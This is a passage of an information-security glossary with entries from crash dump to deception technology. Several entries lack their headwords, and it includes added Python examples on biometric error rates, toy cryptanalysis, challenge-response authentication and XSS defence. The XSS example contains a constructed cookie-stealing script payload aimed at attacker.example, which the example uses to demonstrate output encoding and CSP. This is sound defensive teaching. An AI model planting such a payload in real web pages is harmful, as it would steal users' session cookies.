File containing a snapshot of the contents of main memory at the time of a crash.  Used by systems programmers to analyse the status of the stack, heap, registers, buffers, pointers etc. in an attempt to discover what caused the crash.  Used by hackers to find confidential information such as passwords and encryption keys that had been held temporarily in memory.  Used by malware analysts to identify cryptic malware.

Creative Commons

A not-for-profit organisation promoting free access to and use of intellectual property as in copyleft.  Their standardized licenses cater for various situations ranging from placing information unencumbered into the public domain, through requiring attribution of the owner, to restrictions on commercial use and modification.


Something a person, system etc. presents to confirm (authenticate) their asserted identity (e.g. a passport, password, security token or digital certificate) or professional capabilities (e.g. résumé or curriculum vitae plus the original, authentic education and training certificates).

Credential stuffing

Automated attack in which lists of usernames, passwords and other credentials accumulated from other sources (such as previous hacks) are tried against multiple websites, exploiting the widespread reuse of passwords.  Unlike a classic brute-force attack, each account typically receives only one or a few attempts, so per-account lockouts catch little; the tell-tale pattern is a single source trying many distinct usernames with a low success rate.  If a logon succeeds (proving the credentials valid), further information may be obtained from the compromised account, perhaps leading to direct exploitation and further compromises (identity fraud).  Multi-factor authentication, rate limiting and checking chosen passwords against known-breached corpora are the usual mitigations.


Believable.  Social engineers and fraudsters work hard to make their pretexts credible in order to fool their targets into trusting them inappropriately.


Classic ┐_┐_┐_┐_shaped tops to the battlements of Mediaeval castles.  Archers cowered behind the uprights for protection while raining down arrows upon the attackers below through the gaps.  An ancient physical security control.


UK-based government-supported not-for-profit organisation and scheme to test and accredit penetration testers.  Given the trusted, privileged nature of the work, testers must be competent in order for their clients to place any reliance on their assurance efforts, and must be trustworthy since they may gain access to valuable and/or confidential information assets if (when!) tested security controls fail.  See also CBEST.


Useful hint for a cryptanalyst, often consisting of some known plaintext that, for example, will reveal if the correct decryption key has been found by a brute force attack on the cyphertext.  Standard or routine parts of a message (such as a date/time stamp, predictable sequence number, message type or protocol identifier, greeting or signature) may be useful cribs.

crimeware kit,
attack toolkit,
exploit kit

Software package used to generate and/or distribute malware using libraries of technical exploits, plus the infection and remote-control elements including functions to report statistics on the status of the exploitation process.  A few crimeware kits (such as Carberp and Zeus) have been released onto the Internet.  Some are traded commercially on the black market or hacker underground.  Most are jealously guarded by the hackers who created and maintain them and/or the criminals who pay for and exploit them. 

Criminal underground

See black market.  See also hacker underground.


Chaotic situation immediately following a serious incident, characterized by disorder and panic.  Survival (of people if not the organisation) is generally the overriding priority in a crisis, hence all other considerations (including security) tend to be disregarded until the crisis subsides.

Crisis management

Management activities during a crisis such as evacuating buildings, calling the emergency services, triage and initiating incident management activities as order is gradually restored.

Critical National Infrastructure (CNI),
Critical Corporate Infrastructure (CCI),
Critical Infrastructure (CI)

Shared infrastructure services and supplies, such as electricity, water, fuel, food, telecommunications, government, law enforcement, armed services and the security services, that are considered vital for a nation (CNI) or organisation (CCI).  Significant failure of any of these, perhaps as a result of a physical or electronic attack on the ICT equipment, networks, things or people monitoring and controlling them, is likely to cause immediate disruption and substantial economic damage as well as perhaps causing injuries, deaths, environmental incidents etc., making these attractive targets in cyberwarfare.

Cross border processing

“Either (a) processing of personal data which takes place in the context of the activities of establishments in more than one Member State of a controller or processor in the Union where the controller or processor is established in more than one Member State; or (b) processing of personal data which takes place in the context of the activities of a single establishment of a controller or processor in the Union but which substantially affects or is likely to substantially affect data subjects in more than one Member State” (GDPR).

Cross Site Scripting,

Web attack in which a badly-designed website (e.g. some bulletin-board systems) with inadequate input validation and, above all, missing output encoding is made to return attacker-supplied HTML, JavaScript or other active content to other users’ browsers, where it executes with the privileges of the site’s origin (e.g. to steal session cookies, read supposedly private local data or perform actions as the victim).  The payload may be reflected straight back from a crafted URL, or stored (e.g. in a forum post) and served to every subsequent visitor.  [Denoted “XSS” to avoid being confused with Cascading Style Sheets.]  A form of code injection.  See also XXE.

Crossover Error Rate

In biometric authentication systems, the threshold (tolerance or sensitivity set point) at which the false rejection rate equals the false acceptance rate.  Often quoted as a single-figure measure of a system’s accuracy (lower is better), although the threshold actually deployed is normally chosen according to policy, e.g. tuned towards fewer false acceptances where security matters more than convenience.
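Finding the crossover from a table of false acceptance and false rejection rates, as an added example that is not part of the original glossary.  The FAR/FRR figures are constructed for a hypothetical sensor, and the function names are assumptions for illustration.

```python
# Constructed figures: (threshold, FAR %, FRR %) for a hypothetical biometric sensor.
# Raising the threshold makes matching stricter: FAR falls while FRR rises.
SAMPLE_CURVE = [
    (0.1, 12.0, 0.5),
    (0.2, 8.0, 1.0),
    (0.3, 5.0, 2.0),
    (0.4, 3.0, 3.5),
    (0.5, 1.5, 6.0),
    (0.6, 0.5, 10.0),
]


def crossover_error_rate(curve):
    """Return (threshold, error_rate) at which FAR == FRR, interpolating
    linearly between the two sampled thresholds where FAR - FRR changes sign."""
    for (t0, far0, frr0), (t1, far1, frr1) in zip(curve, curve[1:]):
        d0, d1 = far0 - frr0, far1 - frr1
        if d0 == 0:
            return t0, far0
        if d0 > 0 and d1 <= 0:
            f = d0 / (d0 - d1)           # fraction of the interval at the zero crossing
            return t0 + f * (t1 - t0), far0 + f * (far1 - far0)
    raise ValueError("FAR and FRR do not cross within the sampled thresholds")


def operating_point(curve, max_far):
    """Policy-driven choice: the loosest threshold whose FAR is within the limit,
    returned with the FRR the users will have to live with."""
    for t, far, frr in curve:
        if far <= max_far:
            return t, far, frr
    raise ValueError("no sampled threshold meets the FAR limit")


if __name__ == "__main__":
    print("CER:", crossover_error_rate(SAMPLE_CURVE))
    print("FAR <= 1%:", operating_point(SAMPLE_CURVE, 1.0))
```

For this sensor the curves cross at roughly threshold 0.39 with about 3.3% error each way, but a policy capping FAR at 1% forces the threshold up to 0.6, where one legitimate attempt in ten is rejected; that trade-off, not the CER alone, is what a practitioner has to justify.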


Study and practice of breaking cryptosystems by any means, normally through a combination of mathematics, language analysis, brilliant intuition, lots of time, powerful computers and sheer hard work.  The cryptanalyst may attempt to find and exploit mathematical or technical weaknesses in the algorithm and/or the system and processes that implement it, guess the key by brute force, or somehow disentangle the relationships between known plaintext such as a crib and the corresponding cyphertext.
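The two uses of a crib mentioned above and under the Crib entry, as an added example that is not part of the original glossary: first, a brute-force search over every key in which the crib at a known position identifies the correct key; second, “crib dragging”, sliding the crib along the cyphertext when its position is unknown and discarding placements that contradict themselves.  The cipher is a deliberately weak toy (repeating-key XOR with a two-byte key) chosen so that the search is exhaustive in well under a second; the message, key and crib are constructed.

```python
import string

KEY_LEN = 2                       # key length the analyst has assumed for this toy cipher
PRINTABLE = set(string.printable.encode("ascii"))

# Constructed sample: a routine message with a predictable "DATE: " header (the crib).
PLAINTEXT = b"DATE: 2024-03-01 12:00 FROM: HQ TO: FIELD ADVANCE AT DAWN"
KEY = b"\x5a\xc3"                 # the secret the cryptanalyst does not know
CRIB = b"DATE: "


def xor_repeating(data: bytes, key: bytes) -> bytes:
    """Toy repeating-key XOR cipher; encryption and decryption are the same operation."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


CIPHERTEXT = xor_repeating(PLAINTEXT, KEY)


def brute_force_with_crib(ciphertext: bytes, crib: bytes, key_len: int = KEY_LEN):
    """Try every possible key; keep those whose decryption begins with the crib."""
    head = ciphertext[:len(crib)]
    hits = []
    for n in range(256 ** key_len):
        key = n.to_bytes(key_len, "big")
        if xor_repeating(head, key) == crib:
            hits.append(key)
    return hits


def key_from_crib(ciphertext: bytes, crib: bytes, offset: int, key_len: int = KEY_LEN):
    """Derive the key implied by placing the crib at `offset`.  Because the key
    repeats, the crib constrains each key byte several times; a contradiction
    means the crib cannot sit there, so return None."""
    key = [None] * key_len
    for j, p in enumerate(crib):
        k = ciphertext[offset + j] ^ p
        slot = (offset + j) % key_len
        if key[slot] is None:
            key[slot] = k
        elif key[slot] != k:
            return None
    return None if None in key else bytes(key)


def crib_drag(ciphertext: bytes, crib: bytes, key_len: int = KEY_LEN):
    """Slide the crib along the ciphertext (position unknown) and keep every
    placement whose implied key decrypts the whole message to printable text."""
    hits = []
    for offset in range(len(ciphertext) - len(crib) + 1):
        key = key_from_crib(ciphertext, crib, offset, key_len)
        if key is None:
            continue
        plaintext = xor_repeating(ciphertext, key)
        if all(b in PRINTABLE for b in plaintext):
            hits.append((offset, key, plaintext))
    return hits


if __name__ == "__main__":
    print("brute force:", brute_force_with_crib(CIPHERTEXT, CRIB))
    for offset, key, plaintext in crib_drag(CIPHERTEXT, CRIB):
        print(f"offset {offset}: key={key.hex()} -> {plaintext!r}")
```

With a six-byte crib against a two-byte key the brute force returns exactly one key, which is why predictable headers, greetings and signatures are so damaging: they turn an exhaustive search into a recognisable success condition.  The crib drag shows the second technique, using the structure of the cipher rather than raw search to rule out impossible placements.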


Surreptitious, deliberately hidden, secretive, concealed or non-obvious, such as a fiendishly difficult crossword puzzle.  Not necessarily unauthorized or malicious.  See also covert.


Tradeable virtual currency such as Bitcoin and Litecoin.  Protected against counterfeiting by cryptographic means including blockchain.  Generated by cryptomining.


See cyphertext.

Cryptographic erase

With various important provisos concerning the level of risk, overall process, technology, algorithm, key length and complexity etc., encrypting data or perhaps overwriting it with cyphertext, and then destroying the key, may render confidential information ‘permanently’ irretrievable.  Only data that was encrypted under the destroyed key from the outset is covered: plaintext copies made earlier, and copies or backups of the key held elsewhere, remain recoverable.  “Method of sanitization in which the encryption key for the encrypted target data is sanitized, making recovery of the decrypted target data infeasible” (ISO/IEC 27040).

Cryptographic module

Tamper-resistant computer subsystem consisting of data processing, storage and communications hardware, firmware and/or software, designed to perform cryptographic operations within a defined boundary that the keys never leave, such as receiving, signing or encrypting and returning a nonce using a private key in a challenge-response authentication scenario.
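The challenge-response exchange described above, as an added example that is not part of the original glossary.  The entry describes the asymmetric form (module holds a private key, verifier checks with the public key); because the Python standard library has no public-key primitives, this example substitutes an HMAC over a shared secret, which has the same protocol shape.  The class and function names are assumptions for illustration.  The point a practitioner wants to see is that the nonce is single-use: a captured response must not verify a second time.

```python
import hashlib
import hmac
import secrets


class Token:
    """Stand-in for the cryptographic module: the key never leaves the object,
    which only answers challenges (here with HMAC-SHA256 over a shared secret,
    substituting for a private-key signature)."""

    def __init__(self, key: bytes):
        self._key = key

    def respond(self, nonce: bytes) -> bytes:
        return hmac.new(self._key, nonce, hashlib.sha256).digest()


class Verifier:
    """Relying party: issues fresh random nonces, checks responses in constant
    time and refuses any nonce it did not issue or has already consumed."""

    def __init__(self, key: bytes):
        self._key = key
        self._outstanding = set()

    def challenge(self) -> bytes:
        nonce = secrets.token_bytes(16)
        self._outstanding.add(nonce)
        return nonce

    def verify(self, nonce: bytes, response: bytes) -> bool:
        if nonce not in self._outstanding:
            return False                     # unknown or replayed nonce
        self._outstanding.discard(nonce)     # one-time use, even if the check fails
        expected = hmac.new(self._key, nonce, hashlib.sha256).digest()
        return hmac.compare_digest(expected, response)


def run_exchange(verifier: Verifier, token: Token):
    """Both sides of the protocol: verifier -> nonce -> token -> response -> verifier."""
    nonce = verifier.challenge()
    response = token.respond(nonce)
    return nonce, response, verifier.verify(nonce, response)


if __name__ == "__main__":
    secret = secrets.token_bytes(32)         # provisioned into the token at enrolment
    nonce, response, ok = run_exchange(Verifier(secret), Token(secret))
    print("authenticated:", ok)
```

Replaying the same (nonce, response) pair fails because the verifier forgets a nonce the moment it is used, and a token provisioned with a different key produces a response that fails the constant-time comparison.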


From the Greek words for “hidden” and “writing”, the science, study and practice of creating systems to hide information and to find and retrieve it when needed.  Involves the use of mathematical algorithms for encryption, hashing, authentication etc.

Cryptographic protocol

Specified algorithms, parameters (such as key length) and processes for establishing, using and managing cryptographic authentication, encryption etc.  “An agreed standard for secure communication between two or more entities” (NZ information Security Manual).

Cryptographic system

“A related set of hardware or software used for cryptographic communication, processing or storage, and the administrative framework in which it operates” (NZ information Security Manual).

Cryptographic system material

“Material that includes, but is not limited to, key, equipment, devices, documents and firmware or software that embodies or describes cryptographic logic” (NZ information Security Manual).


One of several nasty species of ransomware in the wild that surreptitiously and strongly encrypts victims’ data, coercing them into paying a ransom for the decryption keys.


Literally, the study of ‘hidden writing’ which encompasses both cryptography and cryptanalysis.  Confusingly also sometimes abbreviated to ‘crypto’.


Application that attempts to generate and/or validate new cryptocurrency, consuming significant computer resources (particularly the graphics processor) and power in the process.  Along with spyware, identity fraud, intellectual property theft and coercion (ransomware), cryptomining is a way for criminals to make money from malware-infected systems without their owners’ knowledge and consent.


An innocuous code-name assigned to a project, assignment, system, individual, organisation, incident etc. to reduce the possibility of disclosing sensitive information.


“The useful life of the cryptographic key” (NZ information Security Manual).

cryptographic primitive

See cryptographic algorithm.


A species of ransomware in the wild in 2016.


Computer system or device that employs cryptography.  Generally taken to include the cryptographic algorithm, the key management processes, external interfaces, software supporting operations and sometimes even the entire PKI.


See key.


One of several nasty species of ransomware in the wild that surreptitiously and strongly encrypts victims’ data, coercing them into paying a ransom for the decryption keys.


A species of ransomware in the wild.  Flaws in the cryptosystem implementation substantially weakened this malware.


One of the earliest species of data-encrypting ransomware, in the wild in 2006.

(Control Strength)

One of the parameters in the FAIR method, CS estimates the ability for controls to mitigate risks (actually, to ‘reduce vulnerabilities’ in FAIR terms) to information assets under analysis.  Strong controls are well designed, fully implemented, highly effective, robust/resilient, unlikely to be bypassed/disabled, used, managed, maintained etc.  See also PLM, LEF, TCap and TEF.

(Cloud Security Alliance)

Industry body for CSPs and their customers, promoting good practices in the information security, privacy and risk aspects of cloud computing.  Cf. Control Self-Assessment.

(Communications Security Establishment)

Canada’s techno-spooks, whose mission is to “provide and protect information of [Canadian] national interest through leading-edge technology”.  Responsible for SIGINT, surveillance etc.

(Cyber Security Framework)

See Cybersecurity framework.

(Canadian Security Intelligence Service)

Canada’s national intelligence agency.

(Cloud Service Provider)

An organisation offering cloud computing services, usually on a commercial basis.

(Content Security Policy)

Directives delivered in the Content-Security-Policy HTTP response header (or an equivalent <meta> element in the page) telling the browser what it may and may not do with the content of an appropriately-coded web page – for example, executing only scripts loaded from an allowed list of origins or carrying a per-response nonce, and refusing inline scripts, plug-in content, third party fonts etc. that might be used for XSS or other code injection attacks on the browser.  Browser extensions are exempt from, and so can override, the page’s CSP, which is a vulnerability; however, the presence of malicious extensions on a system indicates a more significant compromise of the client.
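The two layers of XSS defence discussed above and under Cross Site Scripting, as an added example that is not part of the original glossary: output encoding at the point where untrusted text is written into HTML, plus a CSP header that blocks inline script so a missed encoding somewhere else does not become code execution.  The rendering functions, page layout, script path and header values are assumptions for illustration; the attack payload is constructed.

```python
import html
import secrets


def render_comment_vulnerable(comment: str) -> str:
    """Classic XSS sink: untrusted text concatenated straight into markup."""
    return f'<p class="comment">{comment}</p>'


def render_comment_safe(comment: str) -> str:
    """Contextual output encoding for an HTML text node.  html.escape is correct
    for HTML text and quoted attribute values only; JavaScript, URL and CSS
    contexts each need their own encoder."""
    return f'<p class="comment">{html.escape(comment, quote=True)}</p>'


def csp_headers(nonce: str) -> dict:
    """Content-Security-Policy allowing only same-origin scripts that carry this
    response's nonce; inline handlers, javascript: URLs and plug-ins are blocked."""
    policy = (
        "default-src 'self'; "
        f"script-src 'self' 'nonce-{nonce}'; "
        "object-src 'none'; "
        "base-uri 'none'"
    )
    return {"Content-Security-Policy": policy}


def page(comment: str, nonce: str = None):
    """Assemble (headers, body) for a response that shows a user comment.
    The nonce is generated fresh per response and must not be predictable."""
    nonce = nonce or secrets.token_urlsafe(16)
    body = render_comment_safe(comment)
    document = (
        "<!doctype html><html><head></head><body>"
        + body
        + f'<script nonce="{nonce}" src="/static/app.js"></script>'
        + "</body></html>"
    )
    return csp_headers(nonce), document


if __name__ == "__main__":
    payload = '<script>document.location="https://attacker.example/?c="+document.cookie</script>'
    print(render_comment_vulnerable(payload))
    print(render_comment_safe(payload))
    headers, doc = page(payload)
    print(headers["Content-Security-Policy"])
```

Even if the vulnerable renderer were used by mistake, the injected `<script>` element carries no valid nonce and the browser would refuse to run it under this policy; the encoding fix is still required, because CSP does not stop markup injection from defacing the page or breaking its layout.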

(Corporate Social Responsibility),
corporate sustainability, conscience or citizenship, sustainable or responsible business,
conscious capitalism

An emerging form of organisational self-regulation intended for organisations to be seen to achieve wider social and ethical objectives, in addition to conventional (capitalist, competitive, profit-driven) business objectives.  In the information security context, CSR typically concerns privacy and integrity, for example not intrusively capturing and exploiting personal information about workers and third parties, and overtly supporting the Internet rather than merely using it.


One of several nasty species of ransomware in the wild that surreptitiously and strongly encrypts victims’ data, coercing them into paying a ransom for the decryption keys.

CTF (Capture The Flag)

Simulation of an attack, or a planned campaign consisting of multiple attacks, on an organisation or its sites, networks, IT systems or parts thereof, in which the side on the offensive (commonly called the red team) attempts to place markers (such as fake bombs) and/or retrieve pre-designated information (the flags) to prove that they largely or completely defeated the defenders (the blue team).  Also the name of the hacking competitions in which individuals or teams solve security challenges to retrieve flag strings.  See also purple team.

(Controlled Unclassified Information)

US government term for unclassified information that nevertheless requires some degree of protection, typically for legal compliance reasons (e.g. privacy).  Structured into categories such as critical infrastructure; defense; export control; financial etc.  Intended to replace myriad similar terms (such as SBU and FOUO) now officially deprecated.


Temporary/surrogate owner who takes possession of, and is reasonably expected to care for and protect, an information asset, acting on behalf and in the best interests of its true owner.  “Person or entity that has custody, ownership, control or possession of Electronically Stored Information” (ISO/IEC 27050-1).

(Common Vulnerabilities and Exposures)

MITRE’s original reference database of known software security vulnerabilities, each assigned a unique identifier.  See also CWE.

CVV (Card Verification Value), CVV2 (2nd generation CVV),
CSC (Card Security Code),
CAV (Card Authentication Value), CAV2 (2nd generation CAV), CVC (Card Validation Code), CVC2 (2nd generation CVC), CID (Card Identification Number)

A value encoded on the magnetic stripe (CVV, CVC, CAV) or a 3 or 4-digit decimal number normally printed rather than embossed on a credit/debit/bank card (CVV2, CVC2, CID), used to verify that whoever presents the card number actually holds the card.  Under PCI-DSS it is sensitive authentication data that a merchant must not store after authorisation: once used to validate the transaction, it should be erased from memory so that if the merchant’s systems are ever compromised by crackers, they will not gain the fullz … provided the crackers haven’t installed their own data monitoring/logging software (such as a memory scraper) to capture the data in transit or during processing.

(Common Weakness Enumeration)

MITRE’s community-developed dictionary of commonplace types or classes of software security weaknesses.  Grew out of the CVE.  See also CVE.


Originally coined as a mathematical term, it evolved to mean governance and control, and latterly computing and related ICT, particularly the Internet.  A jargon prefix/buzz-word, much abused by marketers, journalists, politicians etc. and widely misinterpreted.  Inconsistently hyphenated, too.  Prefixed “cyber”, almost any term appears hi-tech and novel whereas in fact most are old hat.

Cyber-Armageddon, cybergeddon

A full-blown unrestrained cyberwar between highly capable and well-resourced nations or groups would undoubtedly inflict devastating economic damage with horrendous social consequences on a global scale, analogous to the nuclear weapons posturing and threats of MAD (Mutually-Assured Destruction) during the Cold War.

cyber attack,

An attack staged primarily through electronic means, particularly through the Internet.  “An attack, via cyberspace, targeting an enterprise’s use of cyberspace for the purpose of disrupting, disabling, destroying, or maliciously controlling a computing environment/infrastructure; or destroying the integrity of the data or stealing controlled information” (CNSSI-4009).  “Malicious attempts to exploit vulnerabilities in information systems or physical systems in cyberspace and to damage, disrupt or gain unauthorized access to these systems” (ISO/IEC 27100 [draft]).


Someone who uses social media, email etc. to harass, intimidate, threaten, coerce and/or traumatize victims.

Cyber command

Military command center for cyber operations, such as the US Cyber Command reportedly based at Fort Meade, Maryland.


The commission of criminal acts in cyberspace.  More informally, the use or exploitation of ICT and/or the Internet to commit crime.


Someone who uses IT systems and networks (particularly the Internet) to commit crime.


Use of IT systems and networks (particularly the Internet) to spy on targets.


Criminal exploitation of illegitimate access to and control over sensitive and/or valuable information in order to coerce victims out of money etc.  Attacks typically involve the use of hacking, malware (e.g. ransomware), theft of data storage media or ICT devices, and/or social engineering.  See also extortion.

Cyber harassment

Harassment or coercion conducted through the Internet, generally, such as revenge porn and spam bombing.

Cyber incident

Information security incident involving ICT.  “Actions taken through the use of computer networks that result in an actual or potentially adverse effect on an information system and/or the information residing therein. See incident.” (CNSSI-4009).


The ICT elements of global, national or corporate infrastructures, especially automated systems interconnected through networks such as the Internet.

Cyberinsurance, cyber insurance, cyber risk insurance

Insurance against specified cyber-risks, a form of risk sharing.

Cyber persona

“Digital representation of an individual or organisation necessary to interact in cyberspace” (ISO/IEC 27101 draft).


Preparing to survive cyberwar or extreme cyber incidents including post-apocalyptic social disorder and infrastructural collapse.


(a) A science fiction genre characterized by classic futuristic ICT works such as William Gibson’s Neuromancer. (b) A proudly nonconformist anti-establishment youth with a deep fascination for the cyber world and hacking plus, often, piercings, tattoos and a curious obsession with black clothing.

Cyber resilience

Resilience, robustness and stability of the cyberinfrastructure.  “The ability of an organisation to continue to carry out its mission by anticipating and adapting to cyber threats and other relevant changes in the environment and by withstanding, containing and rapidly recovering from cyber incidents” (Financial Stability Board Cyber Lexicon, November 2018).

cyber risk,

Potentially damaging or harmful situation involving data, ICT, networking etc., particularly deliberate attacks by hackers, extortionists, criminals, social engineers, fraudsters, terrorists or other competent adversaries.

cyber security

Primarily refers to technical/ICT security controls protecting computer systems, networks and the associated data, in other words IT security.  However, the definition is sometimes widened to include information security as a whole, while some narrow it to refer to defensive measures within cyberwarfare, Internet security, critical [national] infrastructure security, and/or securing virtual worlds.  Caveat lector.  “The ability to protect or defend the use of cyberspace from cyber attacks” (CNSSI-4009).  “The process of protecting information by preventing, detecting, and responding to attacks” (NIST Cybersecurity Framework).  “Includes any processes, practices or technologies that organisations have in place to secure their networks, computers, programs or the data they hold from damage, attack or unauthorised access.” (UK Government Department for Digital, Culture, Media and Sport, Cyber Security Breaches Survey 2018: Technical Annex).

Cybersecurity framework

“Basic set of concepts used to organise and communicate cybersecurity activities” (ISO/IEC 27101 draft).


Vague term, not yet consistently defined, used and understood, typically referring to ICT, particularly the Internet, and sometimes Internet culture, virtual systems, virtual worlds, collaborative working, social media etc.  “A global domain within the information environment consisting of the interdependent network of information systems infrastructures including the Internet, telecommunications networks, computer systems, and embedded processors and controllers” (CNSSI-4009).


Illicit exploitation and misappropriation of commercial trademarks in the cyber/ICT context, for example, using copycat or lookalike domain names or URLs for phishing, fraud or other attacks.  See also typosquatting.

Cyber stalking

Grooming or snooping on victims through the Internet, generally, typically continuing to contact and coerce them after being asked or told to desist.


An attack in, on or through cyberspace.


Sabotage in cyberspace that compromises IT systems/devices, databases, networks, data or information e.g. destroys or damages them, interrupts or delays business activities, or leads to the loss of valuable business or the inappropriate disclosure of confidential information.  Whereas sabotage usually implies inflicting physical damage (such as arson), cybertage often affects intangible information assets (e.g. using malware such as ransomware).


The commission of terrorist acts in cyberspace.  More informally, the use or exploitation of ICT to commit terrorism.


Person who commits cybertage, such as a mole.


Threat or threat agent active in the cybersecurity domain - particularly substantial, highly capable ones backed by governments and other resourceful and determined adversaries.


Computer-enabled wanton damage, or wanton damage of computers.


Person who uses hacking, malware, social engineering etc. to further a malicious personal agenda or obsession.

cyber war,
information warfare

The deliberate exploitation of vulnerabilities in an adversary’s computing and telecommunications capabilities, networks etc. by a nation state as an act of war intended to disrupt vital parts or the entirety of their critical [national] infrastructure, disable their national defences and offensive capabilities, inflict crippling economic damage etc.  Due to exclusions in the small print for ‘acts of war’, incidents classed as cyberwar attacks may not be covered by cyberinsurance.  See also cyber-Armageddon.


Tool or technique (such as a computer, malware, hacking, social engineering, cybertage, spying, coercion or EMP weapon) capable of being used offensively to attack an adversary’s critical infrastructure as part of cyberwar or a similar military mission, and/or to defend against such attacks.

(Cyber Observable eXpression)

A schema for specifying, capturing, characterizing and communicating/sharing IT system and network events and properties for event management and logging, malware characterisation, intrusion detection/prevention, incident response and digital forensics.  See also STIX and TAXII.

Cylinder lock

The most common form of physical lock, used on many front doors.  When someone inserts the correct key into the keyway, internal pins are lifted to exactly the right positions (the shear line) to allow the plug to be rotated in the housing, thereby retracting the latch so the door can be opened.

Cynefin framework

A framework or conceptual model concerning situations or systems that are described as simple (stable and predictable), complicated (largely predictable through cause-and-effect relationships), complex (largely unpredictable, linkages rationalized only after the fact), chaotic (inherently unstable and unpredictable) or disordered (of unknown status).  Different modes of thinking, controlling or directing, planning and responding are appropriate in each case.


An archaic British spelling of cipher that, paradoxically, is used in some modern compound words concerning cryptography.  See algorithm.


Unintelligible string such as HbAaKhBsaao)X]*AX551&*S66 that makes no sense to a human reader but which can be transformed back into the corresponding plaintext using the correct cryptographic algorithm/s and encryption key/s.

Darknet, Darkweb,
dark Web, invisible Web, hidden Web

Covert and illicit part of the deep Web offering criminal/black market services and tools such as hacking, RaaS, money laundering and illegal drugs.  Aside from blocking or evading search engine spiders, Darkweb sites and apps may sit on overlay networks using non-standard protocols (such as Tor), making them inaccessible to users who lack the requisite access authority, knowledge, keys and/or tools.

Dash[board] cam[era], dashcam

CCTV camera mounted in or on a vehicle (not necessarily literally on the dashboard) to record traffic incidents, bad driving, road rage, accidents etc.  A form of surveillance.  See also body cam.

(Dynamic Application
Security Testing)

Automated security testing of a running application from the outside, without access to its source code: in effect penetration testing of the application, probing its exposed interfaces (ports, services, web pages and APIs) with crafted requests to find known vulnerabilities and injection flaws.  See also SAST and IAST.


Electronic representations of information within a computer system or network.  In digital computers, data (and indeed software) consists of sequences of logical ones and zeroes known as bits.  Strictly speaking, data is the plural of “datum” but it is widely used in the singular.  “Collection of values assigned to base measures, derived measures and/or indicators.  Note: this definition applies only within the context of ISO/IEC 27004:2009” (ISO/IEC 15939:2007).

Data Analytics

Fancy marketing term for the common-or-garden study and analysis of data.  Typically involves the use of statistics to examine and glean useful information from large data sets, also known as big data.

Data at rest

Digital bits-n-bytes taking a well-earned break from the daily grind?  Alternatively, “Data stored on stable non-volatile storage” (ISO/IEC 27040).  “Information residing on media or a system that is not powered or is unauthenticated to” (NZ information Security Manual).

  Cf. data in motion.


Structured and managed collection of data.  The structure and accumulation of data, along with the software functions to manage, manipulate and report them, usually make databases far more valuable than plain, unmanaged ‘flat files’ or simple lists and tables.  The most important computer systems often are databases, making database security controls such as those protecting data integrity a vital part of information security.

DataBase Administrator

Privileged user who administers (manages) databases.  Normally responsible for running the DBMS, configuring, maintaining and tuning databases e.g. setting up user rôles and defining their access rights to tables and cells, monitoring security logs etc.

Data breach

A breach involving data.  “Compromise of security that leads to the accidental or unlawful destruction, loss, alteration, unauthorized disclosure of, or access to protected data transmitted, stored or otherwise processed” (ISO/IEC 27040).

Data concerning health

“Personal data related to the physical or mental health of a natural person, including the provision of health care services, which reveal information about his or her health status” (GDPR).  See also PHI.

Data controller

The organisation or person gathering, holding and using personal information, responsible for ensuring it is adequately secured in order to protect the data subjects’ privacy.  Accountable for securing the information, even if it is processed by a separate organisation (a data processor).

Data dictionary

Formal description of the data fields of records in a database, ideally including their information security characteristics.

Data in motion

Digital bits-n-bytes on the move, jiggling about, steadfastly refusing to stay still and be counted?  Alternatively, “Data being transferred from one location to another.  Note: These transfers typically involve interfaces that are accessible and do not include internal transfers (i.e., never exposed to outside of an interface, chip, or device)” (ISO/IEC 27040).  Cf. data at rest.

Data in transit

“Information that is being conveyed across a communication medium” (NZ information Security Manual).

  See also data in motion.

Data in use

Data currently being processed.  “Information that has been decrypted for processing by a system” (NZ information Security Manual).

Data miner

Form of malware that covertly collects information on web users, for example secretly recording personal information submitted by users of online forms.

Data objects

“Elements which contain PII.  Example: such elements are for instance files, documents, records or attributes. Concrete data objects may be e.g. invoices, contracts, personal files, visitor lists, personnel planning sheets, user accounts, log entries, consent documents, and so on.  Note: Data objects can be combined with other data objects in a cluster of PII. The individual data object can be of varying complexity.” (ISO/IEC 27555 draft).

Data spill

“An information security incident that occurs when information is transferred between two security domains by an unauthorised means.  This can include from a classified network to a less classified network or between two areas with different need-to-know requirements” (NZ information Security Manual).

Data Processing (DP)

Prehistoric term for what is now commonly known as the ICT function/department/team or simply “IT”.

Data processor

An organisation that processes personal information on behalf of another (the data controller).  Typically, an ICT or cloud computing services company.

Data protection

See information protection.

Data Protection Directive

“Directive 95/46/EC of the European Parliament and of the Council on the protection of individuals with regard to the processing of personal data and on the free movement of such data” which sought to harmonize information protection or privacy laws across the European Union and further afield (e.g. Australia, Canada and New Zealand).  Being replaced by GDPR.

Data remanence

“Residual information remaining on a device or storage media after clearing or sanitising the device or media. Sometimes described as data persistence” (NZ information Security Manual).

  See also remanence.

Data security

See IT security.


Application supporting both offense using, and defences against, social engineering attacks.  Mines open source intelligence sources and correlates information on individuals, domains, email addresses, phone numbers etc.  An example of dual-use technology, popular with black-, grey- and white-hats.  See also Burp suite and Maltego.

Data stealing/thieving/theft malware

Malware that surreptitiously harvests and exfiltrates valuable proprietary information or personal information from infected systems and networks to be exploited directly or sold on the black market.

Data subject

The person whose personal information it is.

(DataBase Management System)

Specialized software system supporting database applications.  Provides management functions to organise data (usually in the form of tables, matrices, lists or sets) and data security (e.g. enforcing referential integrity).  Provides a standardized interface or abstraction layer between the application and the underlying operating system and hardware.  Heavily optimized for performance and throughput, for example caching frequently-accessed data to reduce disk reads.  Cf. management system (in the ISO sense).

(Distributed [or Digital] Control System)

Originally a term for a process control computer system that uses digital computer technology rather than analogue electro-mechanical controls.  Latterly used to denote SCADA-like ICS distributed around the plant and operating semi-autonomously.

(Data Collection Unit),

Network node or thing that gathers data from other things such as distributed sensors, smart meters etc. and forwards it to a central system, passing commands in the opposite direction.  Used in ICS/SCADA, IIoT and IoT.

(Distributed Denial of Service)

Type of DoS attack using numerous attacking systems (typically bots) to generate large volumes of network traffic, thereby flooding and possibly swamping (overloading) the target systems or network, causing them to stop providing ICT services.  See also DRDoS.

(Data Encryption Algorithm)

Symmetric encryption algorithm specified in FIPS PUB 46 in 1977 for the Data Encryption Standard DES.

Dead drop

See drop.

Dead Letter Box (DLB)

See drop.

Dead double

Identity thief who assumes the identity of a dead person.


Lying, lie, fabrication or deliberate, manipulative concealment of the truth.

Deception technology

